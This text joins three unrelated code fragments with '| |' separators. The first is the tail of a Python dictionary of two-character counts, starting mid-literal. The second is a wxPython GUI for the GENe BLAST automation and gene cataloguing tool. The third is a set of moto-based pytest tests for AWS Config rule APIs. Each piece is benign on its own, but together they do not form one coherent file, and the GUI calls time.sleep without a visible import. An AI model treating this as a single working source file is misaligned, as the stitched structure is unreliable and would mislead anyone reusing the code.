'jw': 191,
'jx': 200,
'jy': 202,
'jz': 146,
'k-': 110,
'k0': 7,
'k1': 29,
'k2': 30,
'k3': 14,
'k4': 5,
'k5': 7,
'k6': 5,
'k7': 7,
'k8': 4,
'k9': 32,
'ka': 3724,
'kb': 212,
'kc': 275,
'kd': 182,
'ke': 6054,
'kf': 130,
'kg': 137,
'kh': 420,
'ki': 6316,
'kj': 144,
'kk': 167,
'kl': 487,
'km': 248,
'kn': 2612,
'ko': 1868,
'kp': 181,
'kq': 59,
'kr': 785,
'ks': 300,
'kt': 192,
'ku': 1013,
'kv': 116,
'kw': 230,
'kx': 88,
'ky': 444,
'kz': 90,
'l-': 45,
'l0': 12,
'l1': 8,
'l2': 60,
'l3': 18,
'l4': 6,
'l5': 2,
'l6': 2,
'l7': 14,
'l8': 5,
'l9': 3,
'la': 14155,
'lb': 350,
'lc': 258,
'ld': 192,
'le': 13390,
'lf': 172,
'lg': 196,
'lh': 179,
'li': 13775,
'lj': 185,
'lk': 82,
'll': 276,
'lm': 185,
'ln': 163,
'lo': 17441,
'lp': 192,
'lq': 75,
'lr': 137,
'ls': 265,
'lt': 197,
'lu': 2947,
'lv': 210,
'lw': 133,
'lx': 124,
'ly': 761,
'lz': 136,
'm-': 162,
'm0': 11,
'm1': 26,
'm2': 47,
'm3': 32,
'm4': 31,
'm5': 8,
'm6': 7,
'm7': 6,
'm8': 11,
'm9': 4,
'ma': 21517,
'mb': 321,
'mc': 856,
'md': 322,
'me': 12983,
'mf': 160,
'mg': 199,
'mh': 180,
'mi': 10847,
'mj': 190,
'mk': 192,
'ml': 403,
'mm': 572,
'mn': 242,
'mo': 11994,
'mp': 473,
'mq': 80,
'mr': 773,
'ms': 631,
'mt': 424,
'mu': 3947,
'mv': 212,
'mw': 145,
'mx': 138,
'my': 8975,
'mz': 124,
'n-': 85,
'n0': 16,
'n1': 16,
'n2': 209,
'n3': 6,
'n4': 10,
'n5': 3,
'n6': 4,
'n7': 6,
'n8': 14,
'n9': 2,
'na': 5028,
'nb': 379,
'nc': 347,
'nd': 186,
'ne': 10656,
'nf': 213,
'ng': 232,
'nh': 270,
'ni': 3672,
'nj': 370,
'nk': 136,
'nl': 174,
'nm': 214,
'nn': 176,
'no': 10377,
'np': 174,
'nq': 65,
'nr': 161,
'ns': 248,
'nt': 270,
'nu': 1902,
'nv': 175,
'nw': 247,
'nx': 119,
'ny': 630,
'nz': 150,
'o-': 95,
'o0': 2,
'o1': 5,
'o2': 28,
'o3': 13,
'o4': 2,
'o5': 5,
'o6': 2,
'o7': 2,
'o8': 4,
'o9': 1,
'oa': 322,
'ob': 1267,
'oc': 959,
'od': 2152,
'oe': 162,
'of': 3428,
'og': 208,
'oh': 1587,
'oi': 1494,
'oj': 147,
'ok': 724,
'ol': 2309,
'om': 1532,
'on': 7256,
'oo': 234,
'op': 1673,
'oq': 58,
'or': 3282,
'os': 555,
'ot': 634,
'ou': 4435,
'ov': 944,
'ow': 4377,
'ox': 218,
'oy': 187,
'oz': 441,
'p-': 86,
'p0': 12,
'p1': 19,
'p2': 43,
'p3': 24,
'p4': 15,
'p5': 8,
'p6': 2,
'p7': 2,
'p8': 5,
'p9': 5,
'pa': 15758,
'pb': 196,
'pc': 606,
'pd': 263,
'pe': 6763,
'pf': 189,
'pg': 207,
'ph': 2496,
'pi': 7203,
'pj': 148,
'pk': 162,
'pl': 7080,
'pm': 258,
'pn': 171,
'po': 11038,
'pp': 369,
'pq': 91,
'pr': 7474,
'ps': 686,
'pt': 286,
'pu': 6557,
'pv': 156,
'pw': 142,
'px': 98,
'py': 246,
'pz': 114,
'q-': 38,
'q0': 3,
'q1': 8,
'q2': 8,
'q3': 6,
'q4': 4,
'q5': 3,
'q6': 3,
'q8': 44,
'q9': 4,
'qa': 220,
'qb': 92,
'qc': 118,
'qd': 194,
'qe': 117,
'qf': 81,
'qg': 84,
'qh': 109,
'qi': 391,
'qj': 79,
'qk': 73,
'ql': 125,
'qm': 82,
'qn': 92,
'qo': 114,
'qp': 102,
'qq': 248,
'qr': 83,
'qs': 131,
'qt': 89,
'qu': 3434,
'qv': 65,
'qw': 148,
'qx': 97,
'qy': 109,
'qz': 152,
'r-': 89,
'r0': 7,
'r1': 10,
'r2': 26,
'r3': 20,
'r4': 17,
'r5': 2,
'r6': 2,
'r7': 10,
'r8': 1,
'r9': 4,
'ra': 9842,
'rb': 211,
'rc': 334,
'rd': 204,
're': 13653,
'rf': 215,
'rg': 139,
'rh': 365,
'ri': 7079,
'rj': 156,
'rk': 119,
'rl': 150,
'rm': 254,
'rn': 173,
'ro': 9275,
'rp': 216,
'rq': 46,
'rr': 143,
'rs': 333,
'rt': 270,
'ru': 4797,
'rv': 182,
'rw': 142,
'rx': 199,
'ry': 348,
'rz': 102,
's-': 122,
's0': 6,
's1': 26,
's2': 33,
's3': 27,
's4': 19,
's5': 10,
's6': 12,
's7': 19,
's8': 12,
's9': 6,
'sa': 17038,
'sb': 328,
'sc': 3980,
'sd': 603,
'se': 18133,
'sf': 356,
'sg': 309,
'sh': 12388,
'si': 10761,
'sj': 286,
'sk': 1551,
'sl': 2639,
'sm': 2210,
'sn': 818,
'so': 11313,
'sp': 6560,
'sq': 323,
'sr': 385,
'ss': 497,
'st': 11992,
'su': 9496,
'sv': 251,
'sw': 1490,
'sx': 289,
'sy': 1044,
'sz': 702,
't-': 149,
't0': 4,
't1': 14,
't2': 16,
't3': 20,
't4': 8,
't5': 8,
't6': 6,
't7': 9,
't8': 34,
't9': 12,
'ta': 10163,
'tb': 227,
'tc': 353,
'td': 239,
'te': 12576,
'tf': 165,
'tg': 186,
'th': 20347,
'ti': 8367,
'tj': 321,
'tk': 178,
'tl': 273,
'tm': 289,
'tn': 269,
'to': 11512,
'tp': 227,
'tq': 90,
'tr': 12301,
'ts': 469,
'tt': 280,
'tu': 3572,
'tv': 534,
'tw': 2193,
'tx': 266,
'ty': 1588,
'tz': 175,
'u-': 119,
'u0': 3,
'u1': 15,
'u2': 21,
'u3': 9,
'u4': 3,
'u5': 3,
'u6': 3,
'u7': 2,
'u8': 11,
'u9': 5,
'ua': 258,
'ub': 352,
'uc': 350,
'ud': 179,
'ue': 138,
'uf': 188,
'ug': 891,
'uh': 194,
'ui': 127,
'uj': 66,
'uk': 422,
'ul': 536,
'um': 326,
'un': 3354,
'uo': 106,
'up': 2718,
'uq': 59,
'ur': 923,
'us': 6826,
'ut': 474,
'uu': 108,
'uv': 172,
'uw': 165,
'ux': 93,
'uy': 107,
'uz': 97,
'v-': 87,
'v0': 3,
'v1': 8,
'v2': 11,
'v3': 20,
'v4': 8,
'v5': 4,
'v6': 14,
'v7': 2,
'v8': 9,
'v9': 2,
'va': 5048,
'vb': 168,
'vc': 200,
'vd': 140,
've': 2797,
'vf': 111,
'vg': 120,
'vh': 121,
'vi': 8878,
'vj': 91,
'vk': 117,
'vl': 172,
'vm': 152,
'vn': 149,
'vo': 2303,
'vp': 172,
'vq': 76,
'vr': 232,
'vs': 192,
'vt': 174,
'vu': 214,
'vv': 139,
'vw': 105,
'vx': 101,
'vy': 119,
'vz': 97,
'w-': 49,
'w0': 9,
'w1': 15,
'w2': 10,
'w3': 49,
'w4': 11,
'w5': 5,
'w6': 2,
'w7': 5,
'w8': 16,
'w9': 7,
'wa': 13399,
'wb': 160,
'wc': 178,
'wd': 138,
'we': 10270,
'wf': 145,
'wg': 135,
'wh': 7676,
'wi': 8165,
'wj': 154,
'wk': 103,
'wl': 169,
'wm': 219,
'wn': 137,
'wo': 4635,
'wp': 199,
'wq': 78,
'wr': 578,
'ws': 246,
'wt': 170,
'wu': 306,
'wv': 136,
'ww': 2494,
'wx': 193,
'wy': 274,
'wz': 183,
'x-': 157,
'x0': 8,
'x1': 15,
'x2': 61,
'x3': 15,
'x4': 2,
'x5': 8,
'x6': 12,
'x7': 3,
'x8': 5,
'x9': 3,
'xa': 329,
'xb': 191,
'xc': 220,
'xd': 145,
'xe': 282,
'xf': 158,
'xg': 136,
'xh': 144,
'xi': 794,
'xj': 208,
'xk': 79,
'xl': 180,
'xm': 285,
'xn': 107,
'xo': 163,
'xp': 292,
'xq': 82,
'xr': 126,
'xs': 195,
'xt': 344,
'xu': 208,
'xv': 78,
'xw': 84,
'xx': 552,
'xy': 237,
'xz': 171,
'y-': 45,
'y0': 5,
'y1': 6,
'y2': 13,
'y3': 2,
'y5': 5,
'y6': 4,
'y7': 4,
'y8': 3,
'y9': 4,
'ya': 1485,
'yb': 102,
'yc': 195,
'yd': 137,
'ye': 2320,
'yf': 106,
'yg': 116,
'yh': 159,
'yi': 568,
'yj': 136,
'yk': 131,
'yl': 168,
'ym': 174,
'yn': 217,
'yo': 4580,
'yp': 214,
'yq': 89,
'yr': 98,
'ys': 233,
'yt': 248,
'yu': 779,
'yv': 101,
'yw': 155,
'yx': 142,
'yy': 176,
'yz': 169,
'z-': 40,
'z0': 4,
'z1': 6,
'z2': 6,
'z3': 5,
'z4': 1,
'z5': 4,
'z7': 2,
'z8': 1,
'z9': 3,
'za': 920,
'zb': 144,
'zc': 129,
'zd': 141,
'ze': 1083,
'zf': 95,
'zg': 277,
'zh': 651,
'zi': 676,
'zj': 315,
'zk': 102,
'zl': 176,
'zm': 120,
'zn': 117,
'zo': 741,
'zp': 107,
'zq': 131,
'zr': 148,
'zs': 167,
'zt': 102,
'zu': 336,
'zv': 70,
'zw': 126,
'zx': 108,
'zy': 171,
'zz': 266,
}
| |
import wx
import os
import sys
import subprocess
from GENe import *
from wx.lib.pubsub import setuparg1
#Nathan Owen, ncowen@email.wm.edu
#GENe GUI - Mac Version
#---------------------------------------------------------------------------------------------------------------
class GENeGUI(wx.Frame):
def __init__(self,parent,id):
wx.Frame.__init__(self,parent,id,'GENe BLAST Automation and Gene Cataloger', size=(800,335), style=wx.MINIMIZE_BOX|wx.SYSTEM_MENU|wx.CAPTION|wx.CLOSE_BOX|wx.CLIP_CHILDREN)
self.Center()
self.panel = wx.Panel(self)
#Check to see if there are other instances of this same program. If so, close out.
self.name = "GENeGUI"
self.instance = wx.SingleInstanceChecker(self.name)
if self.instance.IsAnotherRunning():
wx.MessageBox("Another instance is running already.", "Only one GENe instance at a time.")
time.sleep(5)
sys.exit()
#IO Info
self.openFileName = ''
self.saveFileName = ''
#Static Texts
self.openFileText = wx.StaticText(self.panel, label = '', pos = (147, 18))
self.saveFileText = wx.StaticText(self.panel, label = '', pos = (192, 49))
self.colScroll = wx.StaticText(self.panel, label = 'Column Containing Sequences', pos = (600, 5))
self.progressText = wx.StaticText(self.panel, label = "Waiting to run." , pos = (10, 260))
self.localDBText = wx.StaticText(self.panel, label = "Local Database:" , pos = (85, 190))
self.serverDBText = wx.StaticText(self.panel, label = "Server Database:" , pos = (410, 190))
self.searchText = wx.StaticText(self.panel, label = "BLAST Search Type:" , pos = (410, 153))
self.evalText = wx.StaticText(self.panel, label = "e-value maximum:" , pos = (85, 153))
#Load Bar
self.progressBar = wx.Gauge(self.panel, -1, 1, pos= (10,280), size= (590,20))
#Buttons
catalogButton = wx.Button(self.panel, label = "Run GENe", pos = (600,260), size = (186, 50))
openFileButton = wx.Button(self.panel, label = "Open Excel File", pos = (10,10), size = (125, 30))
saveFileButton = wx.Button(self.panel, label = "Choose Save Destination", pos = (10,40), size = (175,30))
helpButton = wx.Button(self.panel, label = "Help", pos = (735,245), size = (50, 25))
errorLogButton = wx.Button(self.panel, label = "Open Error Log", pos = (600, 245), size = (133, 25))
self.Bind(wx.EVT_BUTTON, self.saveExcelFile, saveFileButton)
self.Bind(wx.EVT_BUTTON, self.openExcelFile, openFileButton)
self.Bind(wx.EVT_BUTTON, self.runCataloger, catalogButton)
self.Bind(wx.EVT_BUTTON, self.openREADME, helpButton)
self.Bind(wx.EVT_BUTTON, self.openErrorLog, errorLogButton)
self.Bind(wx.EVT_CLOSE, self.closewindow)
#Check Boxes
self.localCheck = wx.CheckBox(self.panel, -1, "Local Blast Search (Requires BLAST+)", pos = (85,90))
self.serverCheck = wx.CheckBox(self.panel, -1, "NCBI Server Blast Search (No installation required)", pos = (400,90))
self.serverCheck.SetValue(True)
self.queryType = 'queryServer'
self.xenoCheck = wx.CheckBox(self.panel, -1, "Use Xenopus Laevis algorithm - When disabled, GENe simply records top three BLAST hits.", pos = (85, 115))
self.xenoCheck.SetValue(True)
self.xenopusAlgo = True
self.Bind(wx.EVT_CHECKBOX, self.selectXeno, self.xenoCheck)
self.Bind(wx.EVT_CHECKBOX, self.selectLocal, self.localCheck)
self.Bind(wx.EVT_CHECKBOX, self.selectServer, self.serverCheck)
#Choices
self.dbChoice = wx.Choice(self.panel, -1, pos = (540, 188), choices = ['nr', 'refseq', 'swissprot', 'pat', 'month', 'pdb', 'refseq_mrna', 'refseq_genomic', 'est', 'est_human', \
'est_mouse', 'est_others', 'gss', 'htgs', 'pat', 'dbsts', 'chromosome', 'genome', 'HTGS', 'RefSeq RNA', 'RefSeq Protein', 'Build RNA', 'Build Protein', 'ESTs'])
self.dbChoice.SetStringSelection('nr')
self.serverDatabase = 'nr'
self.searchChoice = wx.Choice(self.panel, -1, pos = (540, 150), choices = ['blastn', 'blastp', 'blastx', 'tblastn', 'tblastx'])
self.searchChoice.SetStringSelection('blastn')
self.searchType = 'blastn'
#Text Entry
self.dbTextBox = wx.TextCtrl (self.panel, -1, 'nt', size = (120, -1), pos = (220, 188))
self.localDatabase = 'nt'
self.evalTextBox = wx.TextCtrl(self.panel, -1, '3', size = (120,-1), pos = (220, 150))
self.eValCap = None
#Scroll Counter Boxes
self.seqColumn = wx.SpinCtrl(self.panel, value='0', pos = (680,24), size = (60, -1))
self.seqColumn.SetRange(0,1000)
self.seqCol = 0
#Initialize GENe instance
self.newCatalog = GENe(self)
def errorPop(self, string, end = False):
'''Given a string that presumably contains an error message, this method will create a popup displaying that message'''
wx.MessageBox(string, "GENe Error or Update")
if end == True:
self.closewindow(None)
def runCataloger(self,event):
"Main method. Passess in most of the GUI's instnace variables to GENe and runs GENe in a thread."
#Make sure there is only one instance of GENe running as a result of this program.
if self.newCatalog.running == False:
#Collect contents from text boxes and GUI choices.
self.eValCap = float(self.evalTextBox.GetValue())
self.serverDatabase = self.dbChoice.GetStringSelection()
self.searchType = self.searchChoice.GetStringSelection()
self.seqCol = int(self.seqColumn.GetValue())
#Format the 'local database' variable for proper use in GENe (differs per operating system)
self.localDatabase = self.dbTextBox.GetValue()
### Double quotes for windows
if 'win32' in sys.platform:
self.localDatabase = '"' + self.localDatabase + '"'
### Single quotes for UNIX (MacOS and Linux)
else:
self.localDatabase = "'" + self.localDatabase + "'"
print "Databases you chose: ", self.localDatabase
#Set instance variables in GENe
self.newCatalog.seqCol = self.seqCol
self.newCatalog.eValCap = self.eValCap
self.newCatalog.queryType = self.queryType
self.newCatalog.searchType = self.searchType
self.newCatalog.xenopusAlgo = self.xenopusAlgo
self.newCatalog.localDatabase = self.localDatabase
self.newCatalog.serverDatabase = self.serverDatabase
#Force user to pick a file if they haven't already.
if self.openFileName == '':
self.openExcelFile(None)
return
if self.saveFileName == '':
self.saveExcelFile(None)
return
#Run the GENe program
self.newCatalog.readBook()
self.progressBar.SetRange(self.newCatalog.numberOfQueries)
if self.queryType == 'queryServer':
self.progressText.SetLabel("Initializing Server BLAST Query...")
if self.queryType == 'queryLocal':
self.progressText.SetLabel("Running Local BLAST Query. This may take a very long time.")
self.newCatalog.start()
def progressUpdate(self, progress):
'''Updates progress bar'''
if progress == -1:
self.progressBar.Pulse()
elif progress == -2:
self.progressText.SetLabel("Complete!")
elif progress == -3:
self.progressText.SetLabel("Terminated Early.")
self.progressBar.SetValue(0)
else:
self.progressBar.SetValue(progress)
progressString = str(progress) + ' of ' + str(self.newCatalog.numberOfQueries) + " catalogged."
self.progressText.SetLabel(progressString)
def openExcelFile(self, event):
dialog = wx.FileDialog(self, message= "Open an Excel File", style = wx.OPEN)
if dialog.ShowModal() == wx.ID_OK:
self.openFileName = dialog.GetPath()
if len(self.openFileName) > 55:
shortName = self.openFileName[0:55] + '...'
else:
shortName = self.openFileName
self.openFileText.SetLabel(shortName)
self.newCatalog.fileToOpen = self.openFileName
dialog.Destroy()
def saveExcelFile(self,event):
dialog = wx.FileDialog(self, message= "Choose save Destination", style = wx.SAVE)
dialog.SetFilename('GENe Results.xls')
if dialog.ShowModal() == wx.ID_OK:
self.saveFileName = dialog.GetPath()
#Make sure that the file being saved is in excel format.
if '.xls' not in self.saveFileName:
self.saveFileName = self.saveFileName + '.xls'
#Shorten up the name to display on the Window
if len(self.saveFileName) > 60:
shortName = self.saveFileName[0:60] + '...'
else:
shortName = self.saveFileName
self.saveFileText.SetLabel(shortName)
self.newCatalog.saveAs = self.saveFileName
dialog.Destroy()
def selectLocal(self, event):
'''Checkbox method for local selection'''
if not self.localCheck.IsChecked():
self.localCheck.SetValue(True)
else:
self.serverCheck.SetValue(False)
self.queryType = 'queryLocal'
def selectServer(self, event):
'''Checkbox method for server selection'''
if not self.serverCheck.IsChecked():
self.serverCheck.SetValue(True)
else:
self.localCheck.SetValue(False)
self.queryType = 'queryServer'
def selectXeno(self, event):
'''Checkbox method for Xenopus Laevis algorithm vs. Top three hits selection'''
if self.xenoCheck.IsChecked():
self.xenopusAlgo = True
else:
self.xenopusAlgo = False
def openREADME(self, event):
subprocess.call(['open', '-a', 'TextEdit', 'README.txt'])
#webbrowser.open('README.txt')
def openErrorLog(self, event):
subprocess.call(['open', '-a', 'TextEdit', 'Errorlog.txt'])
def closewindow(self, event):
del self.instance
sys.exit()
self.Destroy()
if __name__ == '__main__':
    # wx.App(True, filename=...) redirects stdout/stderr into Errorlog.txt.
    app = wx.App(True, filename = 'Errorlog.txt')
    frame = GENeGUI(parent=None, id=-1)
    frame.Show()
    app.MainLoop()
| |
"""Unit tests specific to the ConfigService ConfigRule APIs.
These APIs include:
put_config_rule
describe_config_rule
delete_config_rule
"""
import json
from string import ascii_lowercase
import boto3
from botocore.exceptions import ClientError
import pytest
from moto.config import mock_config
from moto.config.models import random_string
from moto.config.models import ConfigRule, CONFIG_RULE_PAGE_SIZE
from moto import settings
TEST_REGION = "us-east-1" if settings.TEST_SERVER_MODE else "us-west-2"
def managed_config_rule():
    """Return a valid managed AWS Config Rule with a randomized name."""
    rule = {
        "ConfigRuleName": f"managed_rule_{random_string()}",
        "Description": "Managed S3 Public Read Prohibited Bucket Rule",
        "MaximumExecutionFrequency": "One_Hour",
    }
    rule["Scope"] = {
        "ComplianceResourceTypes": ["AWS::S3::Bucket", "AWS::IAM::Group"]
    }
    rule["Source"] = {
        "Owner": "AWS",
        "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED",
    }
    return rule
@mock_config
def test_put_config_rule_errors():
    """Test various error conditions in put_config_rule API call."""
    client = boto3.client("config", region_name=TEST_REGION)
    rule_name_base = "cf_limit_test"

    # Fill the account up to the rule limit, then confirm one more is rejected.
    for i in range(ConfigRule.MAX_RULES):
        rule = managed_config_rule()
        rule["ConfigRuleName"] = f"{rule_name_base}_{i}"
        client.put_config_rule(ConfigRule=rule)
    with pytest.raises(ClientError) as exc:
        rule = managed_config_rule()
        rule["ConfigRuleName"] = f"{rule_name_base}_{ConfigRule.MAX_RULES}"
        client.put_config_rule(ConfigRule=rule)
    err = exc.value.response["Error"]
    assert err["Code"] == "MaxNumberOfConfigRulesExceededException"
    assert "maximum number of config rules" in err["Message"]

    # Free up the memory from the limits test.
    for i in range(ConfigRule.MAX_RULES):
        client.delete_config_rule(ConfigRuleName=f"{rule_name_base}_{i}")

    # A rule name that exceeds 128 chars in length is rejected.
    rule = managed_config_rule()
    rule["ConfigRuleName"] = ascii_lowercase * 5
    with pytest.raises(ClientError) as exc:
        client.put_config_rule(ConfigRule=rule)
    err = exc.value.response["Error"]
    assert err["Code"] == "ValidationException"
    assert "Member must have length less than or equal to 128" in err["Message"]
@mock_config
def test_put_config_rule_update_errors():
    """Test various error conditions when updating ConfigRule."""
    client = boto3.client("config", region_name=TEST_REGION)
    base_rule = {
        "Description": "Managed S3 Public Read Prohibited Bucket Rule",
        "Scope": {"ComplianceResourceTypes": ["AWS::S3::Bucket"]},
        "Source": {
            "Owner": "AWS",
            "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED",
        },
    }
    # Two failure modes share the same error: no name/arn/id at all, and an
    # id ("foo") that does not match any existing rule.
    for identifier_fields in ({}, {"ConfigRuleId": "foo"}):
        rule = dict(base_rule, **identifier_fields)
        with pytest.raises(ClientError) as exc:
            client.put_config_rule(ConfigRule=rule)
        err = exc.value.response["Error"]
        assert err["Code"] == "InvalidParameterValueException"
        assert (
            "One or more identifiers needs to be provided. Provide Name or Id or Arn"
            in err["Message"]
        )
@mock_config
def test_config_rule_errors():  # pylint: disable=too-many-statements
    """Test various error conditions in ConfigRule instantiation."""
    client = boto3.client("config", region_name=TEST_REGION)

    def assert_put_rejected(rule, code, message_part):
        """put_config_rule(rule) must fail with the given code and message."""
        with pytest.raises(ClientError) as exc:
            client.put_config_rule(ConfigRule=rule)
        err = exc.value.response["Error"]
        assert err["Code"] == code
        assert message_part in err["Message"]

    # Missing fields (ParamValidationError) caught by botocore and not
    # tested here: ConfigRule.Source, ConfigRule.ConfigRuleName

    # Supplying an ARN when creating a new rule is rejected.
    rule = managed_config_rule()
    rule["ConfigRuleArn"] = "arn"
    assert_put_rejected(
        rule,
        "InvalidParameterValueException",
        "ConfigRule Arn and Id can not be specified when creating a new "
        "ConfigRule.",
    )

    # Malformed JSON in InputParameters is rejected.
    rule = managed_config_rule()
    bad_json_string = "{'name': 'test', 'type': null, }"
    rule["InputParameters"] = bad_json_string
    assert_put_rejected(
        rule,
        "InvalidParameterValueException",
        f"Invalid json {bad_json_string} passed in the InputParameters field",
    )

    # MaximumExecutionFrequency outside the allowed enum is rejected.
    rule = managed_config_rule()
    rule["MaximumExecutionFrequency"] = "HOUR"
    assert_put_rejected(
        rule,
        "ValidationException",
        "Member must satisfy enum value set: {One_Hour, Six_Hours, "
        "Three_Hours, Twelve_Hours, TwentyFour_Hours}",
    )

    # ConfigRuleState outside the allowed enum is rejected.
    rule = managed_config_rule()
    rule["ConfigRuleState"] = "BOGUS"
    assert_put_rejected(
        rule,
        "ValidationException",
        "Value 'BOGUS' at 'configRule.configRuleState' failed to satisfy "
        "constraint: Member must satisfy enum value set: {ACTIVE, "
        "DELETING, DELETING_RESULTS, EVALUATING}",
    )

    # ConfigRuleState values other than ACTIVE are rejected on create.
    rule = managed_config_rule()
    rule["ConfigRuleState"] = "DELETING"
    assert_put_rejected(
        rule,
        "InvalidParameterValueException",
        "The ConfigRuleState DELETING is invalid. Only the following values "
        "are permitted: ACTIVE",
    )

    # CreatedBy is service-populated and may not be supplied by the caller.
    rule = managed_config_rule()
    rule["CreatedBy"] = "tester"
    assert_put_rejected(
        rule,
        "InvalidParameterValueException",
        "AWS Config populates the CreatedBy field for ServiceLinkedConfigRule. "
        "Try again without populating the CreatedBy field",
    )
@mock_config
def test_aws_managed_rule_errors():
    """Test various error conditions in ConfigRule instantiation."""
    client = boto3.client("config", region_name=TEST_REGION)
    # Extra, unknown input parameter should raise an error.
    managed_rule = managed_config_rule()
    managed_rule["Source"]["SourceIdentifier"] = "IAM_PASSWORD_POLICY"
    managed_rule["InputParameters"] = '{"RequireNumbers":"true","Extra":"10"}'
    with pytest.raises(ClientError) as exc:
        client.put_config_rule(ConfigRule=managed_rule)
    err = exc.value.response["Error"]
    assert err["Code"] == "InvalidParameterValueException"
    assert (
        f"Unknown parameters provided in the inputParameters: "
        f"{managed_rule['InputParameters']}" in err["Message"]
    )
    # Missing required parameters should raise an error.
    managed_rule = managed_config_rule()
    managed_rule["Source"]["SourceIdentifier"] = "CLOUDWATCH_ALARM_ACTION_CHECK"
    with pytest.raises(ClientError) as exc:
        client.put_config_rule(ConfigRule=managed_rule)
    err = exc.value.response["Error"]
    assert err["Code"] == "InvalidParameterValueException"
    assert (
        "The required parameter [alarmActionRequired, "
        "insufficientDataActionRequired, okActionRequired] is not present "
        "in the inputParameters" in err["Message"]
    )
    # If no MaxExecutionFrequency specified, set it to the default.
    # NOTE(review): this scenario is deliberately disabled; presumably the
    # default-frequency behavior is not implemented yet -- confirm before
    # re-enabling.
    # rule_name = f"managed_rule_{random_string()}"
    # managed_rule = {
    #     "ConfigRuleName": rule_name,
    #     "Description": "Managed S3 Public Read Prohibited Bucket Rule",
    #     "Scope": {"ComplianceResourceTypes": ["AWS::IAM::Group"]},
    #     "Source": {
    #         "Owner": "AWS",
    #         "SourceIdentifier": "IAM_PASSWORD_POLICY",
    #     },
    # }
    # client.put_config_rule(ConfigRule=managed_rule)
    # rsp = client.describe_config_rules(ConfigRuleNames=[rule_name])
    # new_config_rule = rsp["ConfigRules"][0]
    # assert new_config_rule["MaximumExecutionFrequency"] == "TwentyFour_Hours"
@mock_config
def test_config_rules_scope_errors():  # pylint: disable=too-many-statements
    """Test various error conditions in ConfigRule.Scope instantiation."""
    client = boto3.client("config", region_name=TEST_REGION)

    def expect_put_error(rule):
        # Attempt the put_config_rule call and hand back the error dict.
        with pytest.raises(ClientError) as exc:
            client.put_config_rule(ConfigRule=rule)
        return exc.value.response["Error"]

    # Tag value supplied without a tag key.
    rule = managed_config_rule()
    rule["Scope"]["TagValue"] = "tester"
    err = expect_put_error(rule)
    assert err["Code"] == "InvalidParameterValueException"
    assert (
        "Tag key should not be empty when tag value is provided in scope"
        in err["Message"]
    )

    # Resource id supplied without a single resource type.
    rule = managed_config_rule()
    rule["Scope"]["ComplianceResourceId"] = "12345"
    err = expect_put_error(rule)
    assert err["Code"] == "InvalidParameterValueException"
    assert (
        "A single resourceType should be provided when resourceId is provided "
        "in scope" in err["Message"]
    )

    # Tag key longer than the 128-character limit.
    rule = managed_config_rule()
    tag_key = "hellobye" * 16 + "x"
    rule["Scope"]["TagKey"] = tag_key
    err = expect_put_error(rule)
    assert err["Code"] == "ValidationException"
    assert (
        f"Value '{tag_key}' at 'ConfigRule.Scope.TagKey' failed to satisfy "
        f"constraint: Member must have length less than or equal to 128"
        in err["Message"]
    )

    # Tag value longer than the 256-character limit.
    rule = managed_config_rule()
    rule["Scope"]["TagKey"] = "test"
    tag_value = "01234567890123456" * 16 + "x"
    rule["Scope"]["TagValue"] = tag_value
    err = expect_put_error(rule)
    assert err["Code"] == "ValidationException"
    assert (
        f"Value '{tag_value}' at 'ConfigRule.Scope.TagValue' failed to "
        f"satisfy constraint: Member must have length less than or equal to "
        f"256" in err["Message"]
    )

    # Tag key combined with the fixture's resource types: resource vs tag.
    rule = managed_config_rule()
    rule["Scope"]["TagKey"] = "test"
    err = expect_put_error(rule)
    assert err["Code"] == "InvalidParameterValueException"
    assert "Scope cannot be applied to both resource and tag" in err["Message"]

    # Tag key combined with a resource id: same conflict.
    rule = managed_config_rule()
    rule["Scope"]["TagKey"] = "test_key"
    rule["Scope"]["ComplianceResourceTypes"] = []
    rule["Scope"]["ComplianceResourceId"] = "12345"
    err = expect_put_error(rule)
    assert err["Code"] == "InvalidParameterValueException"
    assert "Scope cannot be applied to both resource and tag" in err["Message"]
@mock_config
def test_valid_put_config_managed_rule():
    """Test valid put_config_rule API calls for managed rules."""
    client = boto3.client("config", region_name=TEST_REGION)
    # Create managed rule and compare input against describe_config_rule()
    # output.
    managed_rule = managed_config_rule()
    managed_rule["Source"]["SourceIdentifier"] = "IAM_PASSWORD_POLICY"
    managed_rule["Scope"]["ComplianceResourceTypes"] = ["AWS::IAM::Group"]
    managed_rule["Scope"]["ComplianceResourceId"] = "basic_test"
    managed_rule["InputParameters"] = '{"RequireUppercaseCharacters":"true"}'
    managed_rule["ConfigRuleState"] = "ACTIVE"
    client.put_config_rule(ConfigRule=managed_rule)
    rsp = client.describe_config_rules(ConfigRuleNames=[managed_rule["ConfigRuleName"]])
    # Compare as sorted JSON so dict key order does not matter; the
    # server-generated Arn/Id fields are popped first (and reused below).
    managed_rule_json = json.dumps(managed_rule, sort_keys=True)
    new_config_rule = rsp["ConfigRules"][0]
    rule_arn = new_config_rule.pop("ConfigRuleArn")
    rule_id = new_config_rule.pop("ConfigRuleId")
    rsp_json = json.dumps(new_config_rule, sort_keys=True)
    assert managed_rule_json == rsp_json
    # Update managed rule and compare again.
    managed_rule["ConfigRuleArn"] = rule_arn
    managed_rule["ConfigRuleId"] = rule_id
    managed_rule["Description"] = "Updated Managed S3 Public Read Rule"
    managed_rule["Scope"]["ComplianceResourceTypes"] = ["AWS::S3::Bucket"]
    managed_rule["MaximumExecutionFrequency"] = "Six_Hours"
    managed_rule["InputParameters"] = "{}"
    client.put_config_rule(ConfigRule=managed_rule)
    rsp = client.describe_config_rules(ConfigRuleNames=[managed_rule["ConfigRuleName"]])
    managed_rule_json = json.dumps(managed_rule, sort_keys=True)
    rsp_json = json.dumps(rsp["ConfigRules"][0], sort_keys=True)
    assert managed_rule_json == rsp_json
    # Valid InputParameters.
    managed_rule = {
        "ConfigRuleName": f"input_param_test_{random_string()}",
        "Description": "Provide subset of allowed input parameters",
        "InputParameters": '{"blockedPort1":"22","blockedPort2":"3389"}',
        "Scope": {"ComplianceResourceTypes": ["AWS::IAM::SecurityGroup"]},
        "Source": {"Owner": "AWS", "SourceIdentifier": "RESTRICTED_INCOMING_TRAFFIC"},
    }
    client.put_config_rule(ConfigRule=managed_rule)
    rsp = client.describe_config_rules(ConfigRuleNames=[managed_rule["ConfigRuleName"]])
    managed_rule_json = json.dumps(managed_rule, sort_keys=True)
    new_config_rule = rsp["ConfigRules"][0]
    # Server-populated fields are removed before comparing with the input.
    del new_config_rule["ConfigRuleArn"]
    del new_config_rule["ConfigRuleId"]
    del new_config_rule["ConfigRuleState"]
